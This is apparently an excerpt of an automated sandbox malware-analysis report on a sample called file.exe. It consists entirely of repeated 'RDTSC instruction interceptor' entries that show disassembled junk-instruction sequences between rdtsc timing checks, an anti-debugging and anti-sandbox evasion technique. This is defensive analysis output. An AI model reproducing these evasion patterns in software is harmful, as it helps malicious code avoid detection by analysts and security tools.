push eax 0x00000053 pushad 0x00000054 push eax 0x00000055 push edx 0x00000056 jc 00007F2D810C1E56h 0x0000005c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9160B4 second address: 9160B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96C35F second address: 96C365 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96C365 second address: 96C384 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F2D807904B8h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96C384 second address: 96C3B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F2D810C1E68h 0x0000000d jmp 00007F2D810C1E62h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 971198 second address: 9711BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F2D807904A8h 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F2D807904B1h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9711BA second address: 9711C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9711C5 second address: 9711EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2D807904B0h 0x00000009 pop edi 0x0000000a jmp 00007F2D807904B5h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9711EF second address: 9711F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9711F5 second address: 9711F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9711F9 second address: 9711FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9711FD second address: 971208 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 970554 second address: 970584 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jo 00007F2D810C1E56h 0x0000000f jmp 00007F2D810C1E60h 0x00000014 push eax 0x00000015 pop eax 0x00000016 popad 0x00000017 jnl 00007F2D810C1E5Eh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 970584 second address: 970589 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 970589 second address: 970591 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D1AD6 second address: 8D1ADC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 970D00 second address: 970D06 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 970D06 second address: 970D10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 978D3B second address: 978D41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 978D41 second address: 978D4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 978D4A second address: 978D7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F2D810C1E56h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 jmp 00007F2D810C1E67h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8DA0CF second address: 8DA0E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2D807904B1h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8DA0E5 second address: 8DA0ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9773F6 second address: 9773FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 977942 second address: 977946 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 977946 second address: 977954 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 977954 second address: 977958 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 977F5A second address: 977F7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 pushad 0x00000008 jng 00007F2D807904A6h 0x0000000e jmp 00007F2D807904B2h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9787A0 second address: 9787A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9787A4 second address: 9787C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push edi 0x0000000a pop edi 0x0000000b pushad 0x0000000c popad 0x0000000d pop edi 0x0000000e push ecx 0x0000000f push ebx 0x00000010 jnc 00007F2D807904A6h 0x00000016 pop ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F2D807904ABh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 980CD4 second address: 980CD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 980CD8 second address: 980CDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 980E3F second address: 980E45 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 980F90 second address: 980F96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 980F96 second address: 980F9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 980F9A second address: 980FA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F2D807904ACh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98111D second address: 981123 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 981123 second address: 981127 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9813C7 second address: 9813CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9813CB second address: 9813D1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9813D1 second address: 9813E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2D810C1E5Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9813E6 second address: 9813EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9813EA second address: 981415 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F2D810C1E61h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jng 00007F2D810C1E56h 0x00000017 jbe 00007F2D810C1E56h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 981415 second address: 98141E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98141E second address: 981422 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9816D0 second address: 9816D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9816D6 second address: 9816E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jbe 00007F2D810C1E56h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9873E7 second address: 9873ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9879EB second address: 987A07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jo 00007F2D810C1E56h 0x0000000e jmp 00007F2D810C1E5Dh 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 987A07 second address: 987A17 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 pop edx 0x00000008 jbe 00007F2D807904ACh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 987B6E second address: 987B8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a jmp 00007F2D810C1E5Dh 0x0000000f je 00007F2D810C1E56h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 987B8C second address: 987BBD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2D807904B1h 0x00000007 jbe 00007F2D807904C2h 0x0000000d jmp 00007F2D807904B6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 987D07 second address: 987D0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 988134 second address: 98813E instructions: 0x00000000 rdtsc 0x00000002 jne 00007F2D807904A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98813E second address: 988144 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 988297 second address: 98829B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98829B second address: 98829F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98829F second address: 9882A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9891F3 second address: 98920C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2D810C1E63h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98920C second address: 989210 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 989210 second address: 989214 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 986F80 second address: 986FA1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2D807904B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 986FA1 second address: 986FA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 986FA5 second address: 986FA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 986FA9 second address: 986FDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2D810C1E61h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f jmp 00007F2D810C1E69h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 986FDF second address: 986FE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 986FE4 second address: 986FFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2D810C1E63h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 986FFD second address: 987001 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98C492 second address: 98C49D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98C49D second address: 98C4A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9930F7 second address: 99312F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2D810C1E61h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c jne 00007F2D810C1E6Dh 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 992DF0 second address: 992DF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A1B8C second address: 9A1BC1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2D810C1E67h 0x00000007 jmp 00007F2D810C1E62h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e js 00007F2D810C1E5Eh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BA6CE second address: 9BA6F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jp 00007F2D807904BAh 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BA6F2 second address: 9BA705 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2D810C1E56h 0x00000008 jnl 00007F2D810C1E56h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BA705 second address: 9BA711 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F2D807904A6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BAA0E second address: 9BAA2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2D810C1E65h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BAB7C second address: 9BAB80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BAB80 second address: 9BAB9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F2D810C1E64h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BAB9A second address: 9BABAE instructions: 0x00000000 rdtsc 0x00000002 je 00007F2D807904AEh 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BABAE second address: 9BABC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2D810C1E5Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BACF6 second address: 9BAD26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F2D807904A6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pushad 0x0000000d jmp 00007F2D807904B1h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F2D807904AAh 0x00000019 jno 00007F2D807904A6h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BAD26 second address: 9BAD30 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F2D810C1E56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BAD30 second address: 9BAD4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F2D807904B0h 0x0000000c jns 00007F2D807904A6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BAFBC second address: 9BAFC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BAFC7 second address: 9BAFDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2D807904B3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BB986 second address: 9BB9D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2D810C1E66h 0x00000007 jmp 00007F2D810C1E5Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e popad 0x0000000f push eax 0x00000010 jmp 00007F2D810C1E62h 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F2D810C1E60h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BB9D0 second address: 9BB9D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BB9D4 second address: 9BB9DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C018C second address: 9C0192 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C0192 second address: 9C01A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007F2D810C1E56h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C9756 second address: 9C975B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C975B second address: 9C9763 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CD29E second address: 9CD2A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D2775 second address: 9D2793 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2D810C1E5Ah 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e jmp 00007F2D810C1E5Bh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D2793 second address: 9D279B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E1CDD second address: 9E1CE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E1830 second address: 9E186E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F2D807904AAh 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push esi 0x0000000f pop esi 0x00000010 jmp 00007F2D807904B1h 0x00000015 jmp 00007F2D807904B4h 0x0000001a popad 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E186E second address: 9E188B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2D810C1E68h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E1A24 second address: 9E1A3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F2D807904AFh 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E1A3D second address: 9E1A41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E1A41 second address: 9E1A52 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jc 00007F2D807904A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
